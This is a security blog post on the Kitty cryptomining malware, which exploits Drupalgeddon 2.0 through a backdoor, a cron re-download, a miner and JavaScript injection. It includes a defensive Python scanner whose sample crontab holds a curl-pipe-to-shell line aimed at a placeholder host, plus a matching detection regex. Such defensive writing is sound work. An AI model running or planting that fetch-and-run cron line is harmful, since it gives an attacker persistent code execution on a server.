Drupal Malware: How to Fix Drupal Kitty Cryptomining Malware

Drupal, deemed one of the most secure CMSs in the world, has been in the news lately for the wrong reasons. A malware named “Kitty” has infected Drupal sites, leaving them highly susceptible to cryptomining attacks. The malicious script exploits the well-known critical remote code execution vulnerability in Drupal, “Drupalgeddon 2.0”. The Kitty Drupal malware infects vulnerable Drupal sites to compromise their internal networks and web application servers, and also hijacks the browsers of site visitors.

The Drupalgeddon 2.0 vulnerability in Drupal was unearthed in March 2018, affecting versions 7.x and 8.x. It arises from insufficient sanitization of array objects in Drupal’s core modules, ultimately allowing remote code execution. The flaw provides an entry point for various other Drupal malware, Kitty being one of them.

What is the Drupal Kitty Malware?

The “Kitty” cryptomining malware takes advantage of Drupal sites still vulnerable to “Drupalgeddon 2.0” to illegally mine the Monero cryptocurrency. The malicious script exploits the highly critical Drupalgeddon 2.0 remote code execution vulnerability (CVE-2018-7600) and targets servers as well as browsers. The exploit was made public in March and is still extant in most versions of Drupal 7.x and 8.x.

Figure: Infection attempt. Image source: Incapsula

The Drupalgeddon 2.0 vulnerability is caused by insufficient sanitization of array objects in Drupal’s core modules, which allows remote code execution. The vulnerability exposes Drupal sites to various attack vectors, ultimately leading to backdoor implementations, cryptomining attempts, data theft, and account hijacking.

How does the Kitty Malware work?

After the Kitty bash script is executed, the attacker creates a backdoor by writing the PHP file “kdrupal.php” to the infected server’s disk.

Figure: kdrupal.php encoded backdoor

The Base64-decoded source code of the above PHP backdoor is in fact simple: the attacker uses a SHA-512 hash function to protect its remote authentication.

Figure: kdrupal.php decoded backdoor

The script then registers a cron job (cron is a time-based job scheduler) to periodically re-download and execute a bash script from a remote host, thus allowing the attacker to reinfect the server and delay updates to infected servers.


On gaining complete control of the server, the attacker installs and executes “kkworker”, a Monero cryptocurrency miner based on the well-known xmrig miner.

Figure: Server infection with kkworker

However, the attacker doesn’t stop at one server, and instead commands the malware to infect other web resources with a mining script named me0w.js. The attacker does so by altering the index.php file and adding the malicious JavaScript me0w.js to it. In the end, the attacker cheekily asks for the malware to be left alone by printing ‘me0w, don’t delete pls i am a harmless cute little kitty, me0w’.

Figure: Injection of index.php by me0w.js

The Kitty malware is regularly updated, and the operator adds a new version note each time. It appears to be run by an organized attacker, who develops the malware like a software product: fixing bugs and releasing new features.
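To check a server for the artifacts described above, the following added example (not code from the original article or from Drupal) scans a docroot and a crontab dump. The names kdrupal.php, kkworker and me0w.js come from the article; the fetch-and-run regex, the finding labels and the sample crontab are assumptions made for illustration.

```python
import re
from pathlib import Path

# File and script names come from the article; the regex is an assumption.
BACKDOOR_NAME = "kdrupal.php"
MINER_NAME = "kkworker"
INJECTED_SCRIPT = "me0w.js"
# Cron command that downloads something and pipes it straight into a shell.
FETCH_AND_RUN = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")


def scan_docroot(docroot):
    """Return sorted (kind, relative path) findings for a Drupal docroot."""
    root = Path(docroot)
    findings = []
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        if path.name == BACKDOOR_NAME:
            findings.append(("backdoor-file", rel))
        elif path.name == MINER_NAME:
            findings.append(("miner-binary", rel))
        elif path.name == "index.php":
            if INJECTED_SCRIPT in path.read_text(errors="replace"):
                findings.append(("injected-script", rel))
    return sorted(findings)


def scan_crontab(crontab_text):
    """Return cron lines that fetch-and-execute remote code or name the miner."""
    hits = []
    for line in crontab_text.splitlines():
        entry = line.strip()
        if not entry or entry.startswith("#"):
            continue
        if FETCH_AND_RUN.search(entry) or MINER_NAME in entry:
            hits.append(entry)
    return hits


# Constructed sample crontab; malicious.example is a reserved placeholder host.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/drush --root=/var/www/html cron
*/5 * * * * curl -fsSL http://malicious.example/k.sh | sh
"""
```

Feed `scan_crontab` the output of `crontab -l` for the web server user. A clean result does not prove the host is clean, since the article notes the malware is updated regularly and these names can change.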

How to Fix the Kitty Drupal Malware?

While the Kitty malware taints Drupal’s reputation for enforcing strictly secure coding practices in its core modules against online vulnerabilities, it is unarguably still one of the most secure CMS in the world.

To tackle already infected websites, the Drupal community is rolling out software updates. Advice on how to handle infected Drupal websites, and the subsequent procedures to follow, has been published on the official Drupal site.

Prevention is always better than cure. The following prevention steps can help you ensure a safer environment for your Drupal website’s operations.

  • Perform regular file integrity monitoring: Employ tools like Astra to periodically monitor files on the server and get notified immediately of any changes. Hackers tend to modify files on the server and add malware and viruses to the core files of your website. Such code can be executed server-side (i.e. in PHP, Python, etc.) or in the client’s browser (i.e. in JavaScript).
  • Employ Web application firewalls to strip out any malicious web requests before they can do any damage to a potentially vulnerable CMS.
  • Regularly update your CMS: Security patches/updates are often released with newer versions of the CMS. It is highly recommended to routinely scan for new versions and upgrade.
  • Install ALL security patches released by vendors: Almost all CMSs release security patches as and when critical issues are reported. Subscribe to their security mailing lists/RSS feeds and keep your software up to date.
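The file integrity monitoring step above can be sketched as a baseline-and-compare check. This is an added example, not code from the original article or from Astra; the function names `snapshot` and `diff_snapshots` are hypothetical. On a Kitty-infected docroot it would report index.php as modified and kdrupal.php as added.

```python
import hashlib
from pathlib import Path


def snapshot(docroot):
    """Map each file's path (relative to docroot) to its SHA-256 digest."""
    root = Path(docroot)
    digests = {}
    for path in sorted(root.rglob("*")):
        if path.is_file() and not path.is_symlink():
            h = hashlib.sha256()
            with path.open("rb") as fh:
                # Hash in chunks so large files do not load into memory.
                for chunk in iter(lambda: fh.read(65536), b""):
                    h.update(chunk)
            digests[path.relative_to(root).as_posix()] = h.hexdigest()
    return digests


def diff_snapshots(baseline, current):
    """Compare two snapshots and report what changed since the baseline."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(
            p for p in baseline.keys() & current.keys()
            if baseline[p] != current[p]
        ),
    }
```

Take the baseline from a known-good deployment and store it off the web server, so that an attacker with write access to the docroot cannot rewrite it.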

Worried about securing your Drupal site against online attackers? Opt for Astra’s Drupal Security Suite to keep your site out of harm’s way. Subscribe to Astra’s blog on Drupal Security to stay abreast of the latest happenings, patch releases, and vulnerability news.

About The Author

Bhagyeshwari Chauhan

An engineering grad and a technical writer, Bhagyeshwari blogs about web security, futuristic tech and space science.
